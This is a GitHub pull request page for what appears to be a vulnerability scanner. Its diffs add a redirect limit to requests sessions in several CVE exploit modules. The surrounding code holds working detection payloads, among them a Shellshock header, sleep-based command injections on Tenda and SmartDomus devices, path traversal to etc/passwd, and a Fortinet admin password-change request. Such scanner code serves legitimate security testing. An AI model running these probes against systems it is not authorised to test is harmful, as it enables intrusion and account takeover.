Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Set max redirections attribute #38

Merged
merged 11 commits into from
Dec 20, 2023
Merged

Set max redirections attribute #38

Show file tree
Hide file tree
Changes from 10 commits
Commits
Show all changes
11 commits
Select commit Hold shift + click to select a range
a1bf0e3
set max_redirects argument
elyousfi5 Dec 19, 2023
27ed7f2
unit tests
elyousfi5 Dec 19, 2023
304b118
fix arguments
elyousfi5 Dec 19, 2023
796d917
Refactoring
elyousfi5 Dec 19, 2023
186dd42
Remove useless assertions
elyousfi5 Dec 19, 2023
aee2cfa
Init the session in the execution of the rule.
elyousfi5 Dec 20, 2023
8740eaf
Init the session in the execution of the rule.
elyousfi5 Dec 20, 2023
f039bcd
Init the session in the execution of the rule.
elyousfi5 Dec 20, 2023
1dffd53
Init the session in the execution of the rule.
elyousfi5 Dec 20, 2023
d463948
Use requests_exceptions.RequestException
elyousfi5 Dec 20, 2023
3575a92
Refactor
elyousfi5 Dec 20, 2023
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
10 changes: 8 additions & 2 deletions agent/exploits/cve_2014_0780.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -18,6 +18,7 @@

DEFAULT_TIMEOUT = 90
DEPTH = 10
MAX_REDIRECTS = 2


@exploits_registry.register
Expand All @@ -27,15 +28,20 @@ class CVE20140780Exploit(definitions.Exploit):
"""

def accept(self, target: definitions.Target) -> bool:
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
session.verify = False
target_uri = f"{target.scheme}://{target.host}:{target.port}"
try:
requests.get(target_uri, verify=False, timeout=DEFAULT_TIMEOUT)
session.get(target_uri, timeout=DEFAULT_TIMEOUT)
except requests_exceptions.RequestException:
return False
return True

def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
session.verify = False
target_uri = f"{target.scheme}://{target.host}:{target.port}"
file_names = ["boot.ini", "etc/passwd"]
for file_name in file_names:
Expand All @@ -46,7 +52,7 @@ def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
r = requests.Request(method="GET", url=url)
prep = r.prepare()
prep.url = url
response = session.send(prep, verify=False, timeout=DEFAULT_TIMEOUT)
response = session.send(prep, timeout=DEFAULT_TIMEOUT)
except requests.exceptions.RequestException:
return []

Expand Down
12 changes: 7 additions & 5 deletions agent/exploits/cve_2014_7169.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -25,31 +25,33 @@
PAYLOAD_TEMPLATE = "() { :;}; /bin/bash -c 'sleep %s'"
MAX_DELAY_DIFFERENCE = 5
DELAYS = [30, 40, 50, 60]
MAX_REDIRECTS = 2


@exploits_registry.register
class CVE20147169Exploit(definitions.Exploit):
"""CVE-2014-7169: GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability."""

def __init__(self) -> None:
self.session = requests.Session()

def accept(self, target: definitions.Target) -> bool:
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
if target.path.endswith(".cgi") is False:
return False
target_uri = f"{target.scheme}://{target.host}:{target.port}{target.path}"
try:
resp = self.session.get(target_uri, verify=False, timeout=DEFAULT_TIMEOUT)
resp = session.get(target_uri, verify=False, timeout=DEFAULT_TIMEOUT)
except requests_exceptions.RequestException:
return False
return resp.status_code == 200

def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
target_uri = f"{target.scheme}://{target.host}:{target.port}{target.path}"
for delay in DELAYS:
payload = PAYLOAD_TEMPLATE % delay
try:
resp = self.session.get(
resp = session.get(
target_uri,
headers={
"User-Agent": payload,
Expand Down
12 changes: 9 additions & 3 deletions agent/exploits/cve_2016_2386.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -43,6 +43,7 @@
</soapenv:Envelope>
"""
PERMISSION_KEYWORD = "deletePermissionByIdResponse"
MAX_REDIRECTS = 2


@exploits_registry.register
Expand All @@ -52,8 +53,11 @@ class CVE20162386Exploit(definitions.Exploit):
"""

def accept(self, target: definitions.Target) -> bool:
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
session.verify = False
try:
resp = requests.get(target.origin, verify=False, timeout=DEFAULT_TIMEOUT)
resp = session.get(target.origin, timeout=DEFAULT_TIMEOUT)
except requests_exceptions.RequestException:
return False
server = resp.headers.get("server", "Unknown")
Expand All @@ -64,13 +68,15 @@ def accept(self, target: definitions.Target) -> bool:
return LOWER_VULNERABLE_VERSION <= target_version <= UPPER_VULNERABLE_VERSION

def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
session.verify = False
try:
resp = requests.post(
resp = session.post(
urlparse.urljoin(target.origin, TARGET_ENDPOINT),
headers=HEADERS,
data=PAYLOAD,
timeout=DEFAULT_TIMEOUT,
verify=False,
)
except requests_exceptions.RequestException:
return []
Expand Down
15 changes: 10 additions & 5 deletions agent/exploits/cve_2018_10561.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -16,23 +16,30 @@
)

DEFAULT_TIMEOUT = 90
MAX_REDIRECTS = 2


@exploits_registry.register
class CVE201810562Exploit(definitions.Exploit):
"""CVE-2018-10562: Dasan GPON Routers Command Injection Vulnerability."""

def accept(self, target: definitions.Target) -> bool:
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
session.verify = False
target_uri = f"{target.scheme}://{target.host}:{target.port}"
try:
requests.get(target_uri, verify=False, timeout=DEFAULT_TIMEOUT)
session.get(target_uri, timeout=DEFAULT_TIMEOUT)
except requests_exceptions.RequestException:
return False

# TODO(alaeddine): Consider testing for '/?images/', '/GponForm/diag_Form?images/', '/diag.html?images/'.
return True

def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
session.verify = False
target_uri = f"{target.scheme}://{target.host}:{target.port}"
data = {
"XWebPageName": "diag",
Expand All @@ -44,15 +51,13 @@ def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
}

try:
requests.post(
session.post(
target_uri + "/GponForm/diag_Form?images/",
data=data,
verify=False,
timeout=DEFAULT_TIMEOUT,
)
response = requests.get(
response = session.get(
target_uri + "/diag.html?images/",
verify=False,
timeout=DEFAULT_TIMEOUT,
)
except requests_exceptions.RequestException:
Expand Down
15 changes: 9 additions & 6 deletions agent/exploits/cve_2018_13382.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -18,6 +18,7 @@
"Connection": "close",
"Upgrade-Insecure-Requests": "1",
}
MAX_REDIRECTS = 2


@exploits_registry.register
Expand All @@ -27,16 +28,20 @@ class CVE201813382Exploit(definitions.Exploit):
"""

def accept(self, target: definitions.Target) -> bool:
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
session.verify = False
try:
url = f"{target.scheme}://{target.host}:{target.port}/remote/login?lang=en"
r = requests.get(
url, headers=HEADERS, verify=False, timeout=DEFAULT_TIMEOUT
)
r = session.get(url, headers=HEADERS, timeout=DEFAULT_TIMEOUT)
except requests.exceptions.RequestException:
return False
return r.status_code == 200 and "<title>Please Login</title>" in r.text

def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
session.verify = False
url = f"{target.scheme}://{target.host}:{target.port}/remote/login?lang=en"
# we are trying to change the password for the user : admin
data = {
Expand All @@ -49,9 +54,7 @@ def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
"credential2": "ChangePassword",
}
try:
res = requests.post(
url, headers=HEADERS, data=data, verify=False, timeout=DEFAULT_TIMEOUT
)
res = session.post(url, headers=HEADERS, data=data, timeout=DEFAULT_TIMEOUT)
except requests.exceptions.RequestException:
return []

Expand Down
12 changes: 7 additions & 5 deletions agent/exploits/cve_2018_14558.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -21,28 +21,30 @@
TARGET_PATH = "/goform/setUsbUnload/.js?deviceName=A;"
MAX_DELAY_DIFFERENCE = 5
DELAYS = [30, 40, 50, 60]
MAX_REDIRECTS = 2


@exploits_registry.register
class CVE201814558Exploit(definitions.Exploit):
"""CVE-2018-14558: Tenda AC7, AC9, and AC10 Routers Command Injection Vulnerability"""

def __init__(self) -> None:
self.session = requests.Session()

def accept(self, target: definitions.Target) -> bool:
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
target_uri = f"{target.scheme}://{target.host}:{target.port}"
try:
resp = self.session.get(target_uri, verify=False, timeout=DEFAULT_TIMEOUT)
resp = session.get(target_uri, verify=False, timeout=DEFAULT_TIMEOUT)
elyousfi5 marked this conversation as resolved.
Show resolved Hide resolved
except requests_exceptions.RequestException:
return False
return resp.status_code == 200

def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
target_uri = f"{target.scheme}://{target.host}:{target.port}"
for delay in DELAYS:
try:
resp = self.session.get(target_uri + TARGET_PATH + f"sleep {delay}")
resp = session.get(target_uri + TARGET_PATH + f"sleep {delay}")
except requests_exceptions.RequestException:
return []
elapsed = resp.elapsed.seconds
Expand Down
18 changes: 13 additions & 5 deletions agent/exploits/cve_2018_14667.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -24,6 +24,7 @@
JST_PATTERN = re.compile(r"JSF/(.*)")
UPPER_VULNERABLE_VERSION = version.parse("3.3.4")
VERSION_PATTERN = re.compile(r'href="/a4j/s/(\d+_\d+_\d+)\.Final')
MAX_REDIRECTS = 2


@exploits_registry.register
Expand All @@ -33,8 +34,10 @@ class CVE201814667Exploit(definitions.Exploit):
"""

def accept(self, target: definitions.Target) -> bool:
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
try:
resp = requests.get(target.origin, verify=False, timeout=DEFAULT_TIMEOUT)
resp = session.get(target.origin, verify=False, timeout=DEFAULT_TIMEOUT)
except requests_exceptions.RequestException:
return False

Expand All @@ -46,10 +49,15 @@ def accept(self, target: definitions.Target) -> bool:
return JST_PATTERN.search(jsf_header) is not None

def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
resp = requests.get(
target.origin,
timeout=DEFAULT_TIMEOUT,
)
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
try:
resp = session.get(
target.origin,
timeout=DEFAULT_TIMEOUT,
)
except requests.exceptions.RequestException:
return []

if resp.status_code != 200:
return []
Expand Down
8 changes: 6 additions & 2 deletions agent/exploits/cve_2018_7841.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -18,6 +18,7 @@
MAX_DELAY_DIFFERENCE = 5
DELAYS = [30, 40, 50, 60]
TARGET_ENDPOINT = "/smartdomuspad/modules/reporting/track_import_export.php"
MAX_REDIRECTS = 2


@exploits_registry.register
Expand All @@ -27,16 +28,19 @@ class CVE20187841Exploit(definitions.Exploit):
"""

def accept(self, target: definitions.Target) -> bool:
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
target_uri = f"{target.scheme}://{target.host}:{target.port}"
try:
resp = requests.get(target_uri, verify=False, timeout=DEFAULT_TIMEOUT)
resp = session.get(target_uri, verify=False, timeout=DEFAULT_TIMEOUT)
except requests_exceptions.RequestException:
return False
return resp.status_code == 200

def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
target_uri = f"{target.scheme}://{target.host}:{target.port}"
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
target_uri = f"{target.scheme}://{target.host}:{target.port}"

for delay in DELAYS:
data = f"op=export&language=english&interval=1&object_id=`sleep {delay}`"
Expand Down
13 changes: 9 additions & 4 deletions agent/exploits/cve_2019_12989__cve_2019_12991.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -16,6 +16,7 @@

DEFAULT_TIMEOUT = 90
HEADERS = {"SSL_CLIENT_VERIFY": "SUCCESS"}
MAX_REDIRECTS = 2

logger = logging.getLogger(__name__)

Expand All @@ -27,14 +28,20 @@ class CVE201912989Exploit(definitions.Exploit):
"""

def accept(self, target: definitions.Target) -> bool:
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
session.verify = False
target_uri = f"{target.scheme}://{target.host}:{target.port}"
try:
requests.get(target_uri, verify=False, timeout=DEFAULT_TIMEOUT)
session.get(target_uri, timeout=DEFAULT_TIMEOUT)
except requests_exceptions.RequestException:
return False
return True

def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
session.verify = False
url = (
f"{target.scheme}://{target.host}:{target.port}"
f"/sdwan/nitro/v1/config/get_package_file?action=file_download"
Expand All @@ -52,9 +59,7 @@ def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
}
}
try:
r = requests.post(
url, headers=HEADERS, json=json, verify=False, timeout=DEFAULT_TIMEOUT
)
r = session.post(url, headers=HEADERS, json=json, timeout=DEFAULT_TIMEOUT)
except requests.exceptions.RequestException as e:
logger.error("Error : %s", e)
return []
Expand Down
Loading
Loading